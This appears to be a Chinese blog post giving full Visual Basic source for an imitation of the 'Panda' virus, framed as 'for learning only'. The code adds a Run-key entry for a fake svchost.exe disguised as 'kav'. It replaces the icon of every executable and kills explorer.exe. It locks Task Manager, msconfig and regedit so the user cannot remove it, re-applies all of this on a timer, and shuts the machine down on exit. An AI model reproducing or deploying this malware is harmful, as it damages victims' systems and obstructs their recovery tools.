VB 打造 熊猫病毒(仅供学习只用)
小诺重要提醒:
学习病毒原理只用。。。。
不要搞恶意破坏,否则真进了监狱后果自负!
====================form的代码如下==================================
Dim WIT As New WshShell
Dim s As String
Dim objWMIService As Object
Dim colProcessList
Dim objProcess As Object
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Sub Form_Load()
On Error Resume Next
Call WIT.RegWrite("HKEY_CLASSES_ROOT\exefile\DefaultIcon\", App.path & "\setup.ico", "REG_SZ")
Call WIT.RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav", App.path & "\svchost.exe", "REG_SZ")
s = GetSystemPath()
Set objWMIService = GetObject("winmgmts:{impers}!\\.\root\cimv2")
Set colProcessList = objWMIService.ExecQuery("select * FROM Win32_Process")
Dim mProcID As Long
For Each objProcess In colProcessList
If LCase(Trim(objProcess.Name)) = "explorer.exe" Then
mProcID = OpenProcess(1&, -1&, objProcess.ProcessID)
'强行终止test进程
TerminateProcess mProcID, 0&
End If
Next
Shell GetWindowsPath() & "\explorer.exe"
Open s & "\taskmgr.exe" For Binary As #1
Open s & "\msconfig.exe" For Binary As #3
s = GetWindowsPath()
Open s & "\regedit.exe" For Binary As #2
End Sub
Private Sub Form_Unload(Cancel As Integer)
Call WIT.RegWrite("HKEY_CLASSES_ROOT\exefile\DefaultIcon\", App.path & "\setup.ico", "REG_SZ")
Call WIT.RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav", App.path & "\svchost.exe", "REG_SZ")
s = GetSystemPath()
Open s & "\taskmgr.exe" For Binary As #1
Open s & "\msconfig.exe" For Binary As #3
s = GetWindowsPath()
Open s & "\regedit.exe" For Binary As #2
Shell "shutdown -s", vbNormalFocus
End Sub
Private Sub Timer1_Timer()
If WIT.RegRead("HKEY_CLASSES_ROOT\exefile\DefaultIcon\") <> App.path & "\setup.ico" Then
Call WIT.RegWrite("HKEY_CLASSES_ROOT\exefile\DefaultIcon\", App.path & "\setup.ico", "REG_SZ")
Call WIT.RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav", App.path & "\svchost.exe", "REG_SZ")
s = GetSystemPath()
Open s & "\taskmgr.exe" For Binary As #1
Open s & "\msconfig.exe" For Binary As #3
s = GetWindowsPath()
Open s & "\regedit.exe" For Binary As #2
End If
End Sub
=================================Module1代码如下==================================
Public Const SND_SYNC = &H0
Public Const SND_ASYNC = &H1
Public Const SND_NODEFAULT = &H2
Public Const SND_MEMORY = &H4
Public Const SND_LOOP = &H8
Public Const SND_NOSTOP = &H10
Public Const SW_SHOWNORMAL = 1
Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
' 获取Windows目录
Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Public Declare Function fCreateShellLink Lib "STKIT432.DLL" (ByVal lpstrFolderName As String, ByVal lpstrLinkName As String, ByVal lpstrLinkPath As String, ByVal lpstrLinkArgs As String) As Long
Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
' 检查系统目录
Public Function GetSystemPath() As String
Dim p As String * 80
Dim Length As Long
Dim path As String
Length = GetSystemDirectory(p, Len(p))
path = Left(p, Length)
GetSystemPath = path
End Function
' 检查Windows目录
Public Function GetWindowsPath() As String
Dim p As String * 80
Dim Length As Long
Dim path As String
Length = GetWindowsDirectory(p, Len(p))
path = Left(p, Length)
GetWindowsPath = path
End Function
'用户信息
评论